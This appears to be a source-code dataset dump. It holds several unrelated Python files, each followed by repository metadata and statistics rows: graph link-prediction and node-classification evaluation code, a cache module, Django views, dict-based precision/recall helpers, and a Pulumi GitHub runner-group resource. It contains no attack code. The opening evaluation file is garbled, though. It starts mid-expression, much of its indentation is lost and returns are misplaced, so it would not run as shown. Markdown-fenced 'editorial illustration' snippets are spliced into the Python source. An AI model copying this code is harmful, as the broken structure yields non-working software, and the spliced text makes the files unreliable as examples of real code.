else head_neg_cnt]
if test_htypes is None:
nhead_emb = p_h['node'][sub_test_neg_head_ids]
else:
sub_test_neg_htypes = seed_test_neg_htypes[n_i * neg_batch_size: \
(n_i + 1) * neg_batch_size \
if (n_i + 1) * neg_batch_size < head_neg_cnt
else head_neg_cnt]
nhead_emb = th.empty((sub_test_neg_head_ids.shape[0], dim_size), device=device)
for nt in eval_g.ntypes:
if nt in p_h:
loc = (sub_test_neg_htypes == ntype2id[nt])
nhead_emb[loc] = p_h[nt][sub_test_neg_head_ids[loc]]
h_neg_score.append(
model.linkPredictor.calc_neg_head_score(nhead_emb,
ptail_emb,
sub_test_etypes,
1,
ptail_emb.shape[0],
nhead_emb.shape[0],etype2id,device).reshape(-1, nhead_emb.shape[
0]).detach().cpu())
for n_i in range(int((tail_neg_cnt + neg_batch_size - 1) // neg_batch_size)):
sub_test_neg_tail_ids = seed_test_neg_tail_ids[n_i * neg_batch_size: \
(n_i + 1) * neg_batch_size \
if (n_i + 1) * neg_batch_size < tail_neg_cnt
else tail_neg_cnt]
if test_htypes is None:
ntail_emb = p_h['node'][sub_test_neg_tail_ids]
else:
sub_test_neg_ttypes = seed_test_neg_ttypes[n_i * neg_batch_size: \
(n_i + 1) * neg_batch_size \
if (n_i + 1) * neg_batch_size < tail_neg_cnt
else tail_neg_cnt]
ntail_emb = th.empty((sub_test_neg_tail_ids.shape[0], dim_size), device=device)
for nt in eval_g.ntypes:
if nt in p_h:
loc = (sub_test_neg_ttypes == ntype2id[nt])
ntail_emb[loc] = p_h[nt][sub_test_neg_tail_ids[loc]]
t_neg_score.append(model.linkPredictor.calc_neg_tail_score(phead_emb,
ntail_emb,
sub_test_etypes,
1,
phead_emb.shape[0],
ntail_emb.shape[0],etype2id,device).reshape(-1, ntail_emb.shape[
0]).detach().cpu())
t_neg_score = th.cat(t_neg_score, dim=1)
h_neg_score = th.cat(h_neg_score, dim=1)
t_neg_score = F.logsigmoid(t_neg_score)
h_neg_score = F.logsigmoid(h_neg_score)
canonical_etypes = eval_g.canonical_etypes
for idx in range(phead_emb.shape[0]):
if test_htypes is None:
tail_pos = eval_g.has_edges_between(
th.full((seed_test_neg_tail_ids.shape[0],), sub_test_head_ids[idx]).long(),
seed_test_neg_tail_ids,
etype=test_g.etypes[(sub_test_etypes[idx].numpy().item())])
head_pos = eval_g.has_edges_between(seed_test_neg_head_ids,
th.full((seed_test_neg_head_ids.shape[0],),
sub_test_tail_ids[idx]).long(),
etype=test_g.etypes[(sub_test_etypes[idx].numpy().item())])
loc = tail_pos == 1
t_neg_score[idx][loc] += pos_scores[idx]
loc = head_pos == 1
h_neg_score[idx][loc] += pos_scores[idx]
else:
                        head_type = test_g.ntypes[sub_test_htypes[idx].numpy().item()]
                        tail_type = test_g.ntypes[sub_test_ttypes[idx].numpy().item()]
for t in eval_g.ntypes:
if (head_type, test_g.etypes[(sub_test_etypes[idx].numpy().item())], t) in canonical_etypes:
loc = (seed_test_neg_ttypes == ntype2id[t])
t_neg_tail_ids = seed_test_neg_tail_ids[loc]
# there is some neg tail in this type
if t_neg_tail_ids.shape[0] > 0:
tail_pos = eval_g.has_edges_between(
th.full((t_neg_tail_ids.shape[0],), sub_test_head_ids[idx]).long(),
t_neg_tail_ids,
etype=(head_type,
test_g.etypes[(sub_test_etypes[idx].numpy().item())],
t))
t_neg_score[idx][loc][tail_pos == 1] += pos_scores[idx]
if (t, test_g.etypes[(sub_test_etypes[idx].numpy().item())], tail_type) in canonical_etypes:
loc = (seed_test_neg_htypes == ntype2id[t])
t_neg_head_ids = seed_test_neg_head_ids[loc]
# there is some neg head in this type
if t_neg_head_ids.shape[0] > 0:
head_pos = eval_g.has_edges_between(t_neg_head_ids,
th.full((t_neg_head_ids.shape[0],),
sub_test_tail_ids[idx]).long(),
etype=(t,
test_g.etypes[(sub_test_etypes[idx].numpy().item())]
,
tail_type))
h_neg_score[idx][loc][head_pos == 1] += pos_scores[idx]
neg_score = th.cat([h_neg_score, t_neg_score], dim=1)
rankings = th.sum(neg_score >= pos_scores, dim=1) + 1
rankings = rankings.cpu().detach().numpy()
for ranking in rankings:
mrr += 1.0 / ranking
mr += float(ranking)
hit1 += 1.0 if ranking <= 1 else 0.0
hit3 += 1.0 if ranking <= 3 else 0.0
hit10 += 1.0 if ranking <= 10 else 0.0
total_cnt += 1
            res = "MRR {}\nMR {}\nHITS@1 {}\nHITS@3 {}\nHITS@10 {}".format(
                mrr / total_cnt, mr / total_cnt, hit1 / total_cnt,
                hit3 / total_cnt, hit10 / total_cnt)
            print(res)
t1 = time.time()
        print("Full eval {} examples takes {} seconds".format(pos_scores.shape[0], t1 - t0))
return res
    ntype2id = {ntype: i for i, ntype in enumerate(test_g.ntypes)}
    etype2id = {etype: i for i, etype in enumerate(test_g.etypes)}
    train_data = transform_triplets(train_edges, etype2id, ntype2id)
    valid_data = transform_triplets(valid_edges, etype2id, ntype2id)
    test_data = transform_triplets(test_edges, etype2id, ntype2id)
    pos_pairs, neg_pairs = prepare_triplets(train_data, valid_data, test_data)
    minibatch_info, minibatch_blocks = creat_eval_minibatch(test_g, n_layers)
    res = fullgraph_eval(test_g, model, device, dim_size, minibatch_blocks, minibatch_info,
                         pos_pairs, neg_pairs, eval_neg_cnt, ntype2id, etype2id)
return res
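# --- Editorial illustration, not part of the original file. The metric
# accumulation above reduces the 1-based rank of each positive triple among
# its negatives to MRR, MR, and Hits@K; the helper name and sample ranks
# below are made up for the example.

```python
def ranking_metrics(rankings, ks=(1, 3, 10)):
    """Reduce 1-based ranks of positives among negatives to MRR/MR/Hits@K."""
    n = len(rankings)
    metrics = {
        "MRR": sum(1.0 / r for r in rankings) / n,
        "MR": sum(float(r) for r in rankings) / n,
    }
    for k in ks:
        metrics["HITS@{}".format(k)] = sum(1.0 for r in rankings if r <= k) / n
    return metrics
```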
def direct_eval_lppr_link_prediction(test_g, model, train_edges, valid_edges, test_edges, n_hidden, n_layers, eval_neg_cnt=100, use_cuda=True):
    # evaluate PanRep LP module for link prediction
    if use_cuda:
        model.cpu()
        test_g = test_g.to(torch.device("cpu"))
    pr_mrr = "PanRep LP "
    pr_mrr += evaluation_link_prediction(test_g, model, train_edges, valid_edges, test_edges, dim_size=n_hidden,
                                         eval_neg_cnt=eval_neg_cnt,
                                         n_layers=n_layers,
                                         device=torch.device("cpu"))
    if use_cuda:
        model.cuda()
    return pr_mrr
def direct_eval_pr_link_prediction(train_g, test_g, train_edges, valid_edges, test_edges, fanout, batch_size, n_hidden, ntype2id, ng_rate, l2norm,
                                   n_layers, n_lp_epochs, embeddings, use_cuda, device):
    sampler = InfomaxNodeRecNeighborSampler(train_g, [fanout] * (n_layers), device=device)
    pr_train_ind = list(sampler.hetero_map.keys())
    lp_sampler = LinkPredictorEvalSampler(train_g, [fanout] * (1), device=device)
    lp_loader = DataLoader(dataset=pr_train_ind,
                           batch_size=batch_size,
                           collate_fn=lp_sampler.sample_blocks,
                           shuffle=True,
                           num_workers=0)
    lp_model = DLinkPredictorOnlyRel(out_dim=n_hidden, etypes=train_g.etypes, ntype2id=ntype2id, edg_pct=1, ng_rate=ng_rate, use_cuda=True)
    if use_cuda:
        lp_model.cuda()
    lp_optimizer = torch.optim.Adam(lp_model.parameters(), lr=5e-2, weight_decay=l2norm)
    for epoch in range(n_lp_epochs):
        lp_model.train()
        lp_optimizer.zero_grad()
        for i, (seeds, blocks) in enumerate(lp_loader):
            embs = {}
            for ntype in seeds:
                embs[ntype] = embeddings[ntype][seeds[ntype]].to(device)
            loss = lp_model.forward_mb(g=blocks[0], embed=embs)
            loss.backward()
            lp_optimizer.step()
            print("Link Predict finetune loss: {:.4f} Epoch {:05d} | Batch {:03d}".format(loss.item(), epoch, i))
    if use_cuda:
        lp_model.cpu()
        train_g = train_g.to(torch.device("cpu"))
        test_g = test_g.to(torch.device("cpu"))
    pr_mrr = evaluation_link_prediction_wembeds(test_g, lp_model, embeddings, train_edges, valid_edges, test_edges, dim_size=n_hidden,
                                                eval_neg_cnt=100,
                                                n_layers=n_layers,
                                                device=torch.device("cpu"))
    if use_cuda:
        train_g = train_g.to(device)
    return pr_mrr
def macro_micro_f1(y_test, y_pred):
    macro_f1 = f1_score(y_test, y_pred, average='macro')
    micro_f1 = f1_score(y_test, y_pred, average='micro')
    print("Macro micro f1 " + str(macro_f1) + " " + str(micro_f1))
    return macro_f1, micro_f1
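# --- Editorial illustration, not part of the original file. A
# framework-free sketch of what `f1_score(..., average='macro'/'micro')`
# computes above; the function name and toy labels are made up.

```python
def macro_micro_f1_pure(y_true, y_pred):
    """Hand-rolled macro/micro F1 over multi-class integer labels."""
    classes = sorted(set(y_true) | set(y_pred))
    f1s, tp_all, fp_all, fn_all = [], 0, 0, 0
    for c in classes:
        tp = sum(1 for t, p in zip(y_true, y_pred) if t == c and p == c)
        fp = sum(1 for t, p in zip(y_true, y_pred) if t != c and p == c)
        fn = sum(1 for t, p in zip(y_true, y_pred) if t == c and p != c)
        tp_all, fp_all, fn_all = tp_all + tp, fp_all + fp, fn_all + fn
        f1s.append(2 * tp / (2 * tp + fp + fn) if (2 * tp + fp + fn) else 0.0)
    macro = sum(f1s) / len(f1s)          # unweighted mean of per-class F1
    micro = 2 * tp_all / (2 * tp_all + fp_all + fn_all)  # pooled counts
    return macro, micro
```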
def kmeans_test(X, y, n_clusters, repeat=10):
    nmi_list = []
    ari_list = []
    for _ in range(repeat):
        kmeans = KMeans(n_clusters=n_clusters)
        y_pred = kmeans.fit_predict(X)
        nmi_score = normalized_mutual_info_score(y, y_pred, average_method='arithmetic')
        ari_score = adjusted_rand_score(y, y_pred)
        nmi_list.append(nmi_score)
        ari_list.append(ari_score)
    return np.mean(nmi_list), np.std(nmi_list), np.mean(ari_list), np.std(ari_list)
def svm_test(X, y, test_sizes=(0.2, 0.4, 0.6, 0.8), repeat=10):
    random_states = [182318 + i for i in range(repeat)]
    result_macro_f1_list = []
    result_micro_f1_list = []
    for test_size in test_sizes:
        macro_f1_list = []
        micro_f1_list = []
        for i in range(repeat):
            X_train, X_test, y_train, y_test = train_test_split(
                X, y, test_size=test_size, shuffle=True, random_state=random_states[i])
            svm = LinearSVC(dual=False)
            svm.fit(X_train, y_train)
            y_pred = svm.predict(X_test)
            macro_f1 = f1_score(y_test, y_pred, average='macro')
            micro_f1 = f1_score(y_test, y_pred, average='micro')
            macro_f1_list.append(macro_f1)
            micro_f1_list.append(micro_f1)
        result_macro_f1_list.append((np.mean(macro_f1_list), np.std(macro_f1_list)))
        result_micro_f1_list.append((np.mean(micro_f1_list), np.std(micro_f1_list)))
    return result_macro_f1_list, result_micro_f1_list
def evaluate_results_nc(embeddings, labels, num_classes):
    print('SVM test')
    svm_macro_f1_list, svm_micro_f1_list = svm_test(embeddings, labels)
    macro_str = 'Macro-F1: ' + ', '.join(['{:.6f}~{:.6f} ({:.1f})'.format(macro_f1_mean, macro_f1_std, train_size) for
                                          (macro_f1_mean, macro_f1_std), train_size in
                                          zip(svm_macro_f1_list, [0.8, 0.6, 0.4, 0.2])])
    micro_str = 'Micro-F1: ' + ', '.join(['{:.6f}~{:.6f} ({:.1f})'.format(micro_f1_mean, micro_f1_std, train_size) for
                                          (micro_f1_mean, micro_f1_std), train_size in
                                          zip(svm_micro_f1_list, [0.8, 0.6, 0.4, 0.2])])
    print(macro_str)
    print(micro_str)
    print('K-means test')
    nmi_mean, nmi_std, ari_mean, ari_std = kmeans_test(embeddings, labels, num_classes)
    print('NMI: {:.6f}~{:.6f}'.format(nmi_mean, nmi_std))
    print('ARI: {:.6f}~{:.6f}'.format(ari_mean, ari_std))
    return svm_macro_f1_list, svm_micro_f1_list, nmi_mean, nmi_std, ari_mean, ari_std, macro_str, micro_str
class Dataset(th.utils.data.Dataset):
    'Characterizes a dataset for PyTorch'
    def __init__(self, list_IDs, labels, features):
        'Initialization'
        self.labels = labels
        self.list_IDs = list_IDs
        self.features = features

    def __len__(self):
        'Denotes the total number of samples'
        return len(self.list_IDs)

    def __getitem__(self, index):
        'Generates one sample of data'
        # Select sample
        ID = self.list_IDs[index]
        # Load data and get label
        X = self.features[ID]
        y = self.labels[ID]
        return X, y
def dcg_at_k(r, k):
    r = np.asfarray(r)[:k]
    if r.size:
        return r[0] + np.sum(r[1:] / np.log2(np.arange(2, r.size + 1)))
    return 0.


def ndcg_at_k(r, k):
    dcg_max = dcg_at_k(sorted(r, reverse=True), k)
    if not dcg_max:
        return 0.
    return dcg_at_k(r, k) / dcg_max
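# --- Editorial illustration, not part of the original file. The DCG
# formulation above weights positions 1 and 2 equally (log2(2) == 1), so
# only demotions below position 2 lower the score; this dependency-free
# re-statement (name and sample relevances made up) makes that visible.

```python
import math


def dcg_variant(rel, k):
    """Same DCG variant as above, without NumPy: r[0] + sum r[i]/log2(i+1)."""
    rel = [float(x) for x in rel[:k]]
    if not rel:
        return 0.0
    return rel[0] + sum(r / math.log2(i) for i, r in enumerate(rel[1:], start=2))
```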
def _compute_acc(logits, labels, multilabel):
    if multilabel:
        valid_res = []
        for ai, bi in zip(labels, logits.argsort(descending=True)):
            valid_res += [(ai[bi.cpu().numpy()]).cpu().numpy()]
        valid_ndcg = np.average([ndcg_at_k(resi, len(resi)) for resi in valid_res])
        return valid_ndcg
    else:
        return th.sum(logits.argmax(dim=1).cpu() == labels.cpu()).item() / len(labels)


def compute_acc(results, labels, multilabel):
    """
    Compute the accuracy of prediction given the labels.
    """
    if multilabel:
        return _compute_acc(results, labels, multilabel)
    else:
        labels = labels.long()
        return (results == labels).float().sum() / len(results)
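# --- Editorial illustration, not part of the original file. The
# single-label branch above is just argmax-vs-label accuracy; this
# framework-free sketch (name and toy logits made up) shows the same
# computation on plain lists.

```python
def argmax_accuracy(logits, labels):
    """Fraction of rows whose argmax matches the integer label."""
    preds = [max(range(len(row)), key=row.__getitem__) for row in logits]
    return sum(p == t for p, t in zip(preds, labels)) / len(labels)
```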
def mlp_classifier(args, feats, use_cuda, n_hidden, lr_d,
                   n_cepochs, multilabel, num_classes,
                   labels, train_idx, val_idx, test_idx, device,
                   batch_size=512):
    ###
    # Use the encoded features for classification
    # Here we initialize the features using the reconstructed ones
    # feats = g.nodes[category].data['features']
    l2norm = 0.0001
    inp_dim = feats.shape[1]
    model = ClassifierMLP(input_size=inp_dim, hidden_size=n_hidden, out_size=num_classes)
    if use_cuda:
        model.cuda()
        feats = feats.cuda()
    params = {'batch_size': batch_size,
              'shuffle': True,
              'num_workers': 0}
    # Generators
    training_set = Dataset(train_idx, labels, feats)
    training_generator = th.utils.data.DataLoader(training_set, **params)
    validation_set = Dataset(val_idx, labels, feats)
    validation_generator = th.utils.data.DataLoader(validation_set, **params)
    # optimizer
    optimizer = torch.optim.Adam(model.parameters(), lr=lr_d, weight_decay=l2norm)
    # training loop
    print("start training...")
    forward_time = []
    backward_time = []
    model.train()
    # TODO find all zero indices rows and remove.
    if len(labels.shape) > 1:
        zero_rows = np.where(~(labels).cpu().numpy().any(axis=1))[0]
        train_idx = np.array(list(set(train_idx).difference(set(zero_rows))))
        val_idx = np.array(list(set(val_idx).difference(set(zero_rows))))
        test_idx = np.array(list(set(test_idx).difference(set(zero_rows))))
    train_indices = torch.tensor(train_idx).to(device).long()
    valid_indices = torch.tensor(val_idx).to(device).long()
    test_indices = torch.tensor(test_idx).to(device).long()
    best_val_acc = 0
    best_test_acc = 0
    labels_n = labels
    if multilabel is False:
        loss_func = torch.nn.CrossEntropyLoss()
    else:
        if args.klloss:
            loss_func = torch.nn.KLDivLoss(reduction='batchmean')
        else:
            loss_func = torch.nn.BCEWithLogitsLoss()
    for epoch in range(n_cepochs):
        for local_batch, local_labels in training_generator:
            optimizer.zero_grad()
            logits = model(local_batch)
            local_labels = local_labels.to(device)
            if args.klloss and multilabel:
                logits = torch.log_softmax(logits.squeeze(), dim=-1)
            loss = loss_func(logits, (local_labels))
            loss.backward()
            optimizer.step()
            # train_acc = compute_acc(results=pred, labels=local_labels, multilabel=multilabel)
        if epoch % 2 == 0:
            pred = model(feats)
            if multilabel is False:
                pred = pred.argmax(dim=1)
            else:
                if args.klloss and multilabel:
                    pred = torch.log_softmax(pred.squeeze(), dim=-1)
            train_acc = compute_acc(results=pred[train_indices], labels=labels[train_indices], multilabel=multilabel)
            val_acc = compute_acc(results=pred[valid_indices], labels=labels[valid_indices], multilabel=multilabel)
            test_acc = compute_acc(results=pred[test_indices], labels=labels[test_indices], multilabel=multilabel)
            if best_val_acc < val_acc:
                best_val_acc = val_acc
                best_test_acc = test_acc
        if epoch % 5 == 0:
            print('Epoch ' + str(epoch))
            print(' Train Acc %.4f, Val Acc %.4f (Best %.4f), Test Acc %.4f (Best %.4f)' % (
                train_acc.item() if th.is_tensor(train_acc) else train_acc,
                val_acc.item() if th.is_tensor(val_acc) else val_acc,
                best_val_acc.item() if th.is_tensor(best_val_acc) else best_val_acc,
                test_acc.item() if th.is_tensor(test_acc) else test_acc,
                best_test_acc.item() if th.is_tensor(best_test_acc) else best_test_acc
            ))
            print()
    return best_test_acc
| 53.456722 | 141 | 0.509956 | 6,915 | 58,054 | 3.902965 | 0.056399 | 0.029568 | 0.022231 | 0.016599 | 0.791137 | 0.762866 | 0.750861 | 0.744637 | 0.733669 | 0.733669 | 0 | 0.016712 | 0.402177 | 58,054 | 1,086 | 142 | 53.456722 | 0.760935 | 0.022272 | 0 | 0.753439 | 0 | 0.001058 | 0.01473 | 0 | 0.002116 | 0 | 0 | 0.001842 | 0.006349 | 1 | 0.026455 | false | 0 | 0.013757 | 0 | 0.070899 | 0.019048 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6
798566474472edcaa08f8e52ae1390d1c26ca7e9 | 94 | py | Python | tap_lever/streams/cache.py | luandy64/tap-lever | 68aa7bcb65b98d2e8c47adaa3679ce43a018b83b | [
"Apache-2.0"
] | null | null | null | tap_lever/streams/cache.py | luandy64/tap-lever | 68aa7bcb65b98d2e8c47adaa3679ce43a018b83b | [
"Apache-2.0"
] | 1 | 2019-11-06T15:35:03.000Z | 2019-11-06T17:00:27.000Z | tap_lever/streams/cache.py | luandy64/tap-lever | 68aa7bcb65b98d2e8c47adaa3679ce43a018b83b | [
"Apache-2.0"
] | 2 | 2019-06-10T19:34:38.000Z | 2020-06-30T21:20:36.000Z |
CACHE = {}


def add(key, val):
    CACHE[key] = val


def get(key):
    return CACHE.get(key)
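# --- Editorial illustration, not part of the original file. The
# module-level dict above acts as a process-wide memo shared by every
# importer; the demo names and key below are made up.

```python
demo_cache = {}


def demo_add(key, val):
    demo_cache[key] = val


def demo_get(key):
    # dict.get returns None for missing keys instead of raising
    return demo_cache.get(key)


demo_add("candidates", [1, 2, 3])
```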
| 10.444444 | 25 | 0.574468 | 15 | 94 | 3.6 | 0.466667 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.255319 | 94 | 8 | 26 | 11.75 | 0.771429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0.2 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
7990acf040583f0177b4e2ad62a965cfae580ebf | 186 | py | Python | app/main/views.py | shift37/asx_gym | dd3d8dafae4f22ab9c9027bf362013255dbc6c36 | [
"RSA-MD"
] | null | null | null | app/main/views.py | shift37/asx_gym | dd3d8dafae4f22ab9c9027bf362013255dbc6c36 | [
"RSA-MD"
] | 3 | 2020-06-06T08:27:08.000Z | 2020-06-13T09:51:26.000Z | app/main/views.py | asxgym/asx_gym | 8b7745820c0d4cd59281acf7c003ec1f1938005a | [
"RSA-MD"
] | null | null | null | from django.views.generic import TemplateView
class IndexView(TemplateView):
template_name = "main/index.html"
class PriceView(TemplateView):
template_name = "main/price.html"
| 23.25 | 45 | 0.774194 | 22 | 186 | 6.454545 | 0.681818 | 0.28169 | 0.338028 | 0.394366 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 186 | 7 | 46 | 26.571429 | 0.876543 | 0 | 0 | 0 | 0 | 0 | 0.16129 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
79b5d0ef9d0fbac54ad1f91b5d2391133bd869af | 2,033 | py | Python | src/ssh-kd/utils/eval.py | kiat/debs2019 | b1231a0995a154f8549ef23a00f635b81cc3c689 | [
"Apache-2.0"
] | null | null | null | src/ssh-kd/utils/eval.py | kiat/debs2019 | b1231a0995a154f8549ef23a00f635b81cc3c689 | [
"Apache-2.0"
] | 1 | 2018-12-11T23:19:14.000Z | 2018-12-12T06:39:53.000Z | src/ssh-kd/utils/eval.py | kiat/debs2019 | b1231a0995a154f8549ef23a00f635b81cc3c689 | [
"Apache-2.0"
] | 1 | 2021-05-06T21:54:47.000Z | 2021-05-06T21:54:47.000Z | from functools import reduce
def accuracy(a, b):
common_keys = set(a).intersection(b)
all_keys = set(a).union(b)
score = len(common_keys) / len(all_keys) #key score
if (score == 0):
return score, 'zero'
else: #value score
pred = {}
for k in common_keys:
pred[k] = b[k]
#true_values_sum = reduce(lambda x,y:int(x)+int(y),a.values())
all_keys = dict.fromkeys(all_keys, 0)
for k in a.keys():
all_keys.update({k:a[k]})
for k in b.keys():
all_keys.update({k:b[k]})
true_values_sum = reduce(lambda x,y:int(x)+int(y),all_keys.values())
pred_values_sum = reduce(lambda x,y:int(x)+int(y),pred.values())
val_score = int(pred_values_sum)/int(true_values_sum)
if score >= val_score:
return (score+val_score)/2,'avg'
else:
return score,'score'
def precision(a, b):
    # return len(set(a).intersection(b)) / len(a)
    common_keys = set(a).intersection(b)
    score = len(common_keys) / len(a)
    if score == 0:
        return score
    else:
        pred = {}
        for k in common_keys:
            pred[k] = b[k]
        true_values_sum = reduce(lambda x, y: int(x) + int(y), a.values())
        pred_values_sum = reduce(lambda x, y: int(x) + int(y), pred.values())
        val_score = int(pred_values_sum) / int(true_values_sum)
        if score >= val_score:
            return (score + val_score) / 2
        else:
            return score
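# --- Editorial illustration, not part of the original file. The dict-based
# precision above blends key overlap with predicted-count mass; this
# self-contained sketch (name and toy dicts made up) traces one case:
# key score 0.5 and value score 0.5 average back to 0.5.

```python
from functools import reduce


def toy_precision(a, b):
    common = set(a).intersection(b)
    score = len(common) / len(a)          # key score
    if score == 0:
        return score
    pred = {k: b[k] for k in common}
    true_sum = reduce(lambda x, y: int(x) + int(y), a.values())
    pred_sum = reduce(lambda x, y: int(x) + int(y), pred.values())
    val_score = int(pred_sum) / int(true_sum)  # value score
    return (score + val_score) / 2 if score >= val_score else score
```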
def recall(a, b):
    common_keys = set(a).intersection(b)
    score = len(common_keys) / len(b)
    if score == 0:
        return score
    else:
        pred = {}
        for k in common_keys:
            pred[k] = b[k]
        true_values_sum = reduce(lambda x, y: int(x) + int(y), b.values())
        pred_values_sum = reduce(lambda x, y: int(x) + int(y), pred.values())
        val_score = int(pred_values_sum) / int(true_values_sum)
        if score >= val_score:
            return (score + val_score) / 2
        else:
            return score
| 32.790323 | 76 | 0.567634 | 309 | 2,033 | 3.569579 | 0.135922 | 0.106074 | 0.082502 | 0.133273 | 0.805984 | 0.757026 | 0.737081 | 0.737081 | 0.708976 | 0.708976 | 0 | 0.004844 | 0.289228 | 2,033 | 62 | 77 | 32.790323 | 0.758478 | 0.06001 | 0 | 0.654545 | 0 | 0 | 0.006289 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054545 | false | 0 | 0.018182 | 0 | 0.236364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6
79ce3138d019a740f67ced95d87081781bd7b506 | 19,832 | py | Python | sdk/python/pulumi_github/actions_runner_group.py | pulumi/pulumi-github | 303ed7a28cbfe6ba1db75b3b365dcfa0b00e6e91 | [
"ECL-2.0",
"Apache-2.0"
] | 20 | 2020-04-27T15:05:01.000Z | 2022-02-08T00:28:32.000Z | sdk/python/pulumi_github/actions_runner_group.py | pulumi/pulumi-github | 303ed7a28cbfe6ba1db75b3b365dcfa0b00e6e91 | [
"ECL-2.0",
"Apache-2.0"
] | 103 | 2020-05-01T17:36:32.000Z | 2022-03-31T15:26:35.000Z | sdk/python/pulumi_github/actions_runner_group.py | pulumi/pulumi-github | 303ed7a28cbfe6ba1db75b3b365dcfa0b00e6e91 | [
"ECL-2.0",
"Apache-2.0"
] | 4 | 2020-06-24T19:15:02.000Z | 2021-11-26T08:05:46.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['ActionsRunnerGroupArgs', 'ActionsRunnerGroup']
@pulumi.input_type
class ActionsRunnerGroupArgs:
def __init__(__self__, *,
visibility: pulumi.Input[str],
name: Optional[pulumi.Input[str]] = None,
selected_repository_ids: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None):
"""
The set of arguments for constructing a ActionsRunnerGroup resource.
:param pulumi.Input[str] visibility: Visibility of a runner group. Whether the runner group can include `all`, `selected`, or `private` repositories. A value of `private` is not currently supported due to limitations in the GitHub API.
:param pulumi.Input[str] name: Name of the runner group
:param pulumi.Input[Sequence[pulumi.Input[int]]] selected_repository_ids: IDs of the repositories which should be added to the runner group
"""
pulumi.set(__self__, "visibility", visibility)
if name is not None:
pulumi.set(__self__, "name", name)
if selected_repository_ids is not None:
pulumi.set(__self__, "selected_repository_ids", selected_repository_ids)
@property
@pulumi.getter
def visibility(self) -> pulumi.Input[str]:
"""
Visibility of a runner group. Whether the runner group can include `all`, `selected`, or `private` repositories. A value of `private` is not currently supported due to limitations in the GitHub API.
"""
return pulumi.get(self, "visibility")
@visibility.setter
def visibility(self, value: pulumi.Input[str]):
pulumi.set(self, "visibility", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the runner group
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="selectedRepositoryIds")
def selected_repository_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]:
"""
IDs of the repositories which should be added to the runner group
"""
return pulumi.get(self, "selected_repository_ids")
@selected_repository_ids.setter
def selected_repository_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]):
pulumi.set(self, "selected_repository_ids", value)
@pulumi.input_type
class _ActionsRunnerGroupState:
def __init__(__self__, *,
allows_public_repositories: Optional[pulumi.Input[bool]] = None,
default: Optional[pulumi.Input[bool]] = None,
etag: Optional[pulumi.Input[str]] = None,
inherited: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
runners_url: Optional[pulumi.Input[str]] = None,
selected_repositories_url: Optional[pulumi.Input[str]] = None,
selected_repository_ids: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
visibility: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ActionsRunnerGroup resources.
:param pulumi.Input[bool] allows_public_repositories: Whether public repositories can be added to the runner group
:param pulumi.Input[bool] default: Whether this is the default runner group
:param pulumi.Input[str] etag: An etag representing the runner group object
:param pulumi.Input[bool] inherited: Whether the runner group is inherited from the enterprise level
:param pulumi.Input[str] name: Name of the runner group
:param pulumi.Input[str] runners_url: The GitHub API URL for the runner group's runners
:param pulumi.Input[str] selected_repositories_url: Github API URL for the runner group's repositories
:param pulumi.Input[Sequence[pulumi.Input[int]]] selected_repository_ids: IDs of the repositories which should be added to the runner group
:param pulumi.Input[str] visibility: Visibility of a runner group. Whether the runner group can include `all`, `selected`, or `private` repositories. A value of `private` is not currently supported due to limitations in the GitHub API.
"""
if allows_public_repositories is not None:
pulumi.set(__self__, "allows_public_repositories", allows_public_repositories)
if default is not None:
pulumi.set(__self__, "default", default)
if etag is not None:
pulumi.set(__self__, "etag", etag)
if inherited is not None:
pulumi.set(__self__, "inherited", inherited)
if name is not None:
pulumi.set(__self__, "name", name)
if runners_url is not None:
pulumi.set(__self__, "runners_url", runners_url)
if selected_repositories_url is not None:
pulumi.set(__self__, "selected_repositories_url", selected_repositories_url)
if selected_repository_ids is not None:
pulumi.set(__self__, "selected_repository_ids", selected_repository_ids)
if visibility is not None:
pulumi.set(__self__, "visibility", visibility)
@property
@pulumi.getter(name="allowsPublicRepositories")
def allows_public_repositories(self) -> Optional[pulumi.Input[bool]]:
"""
Whether public repositories can be added to the runner group
"""
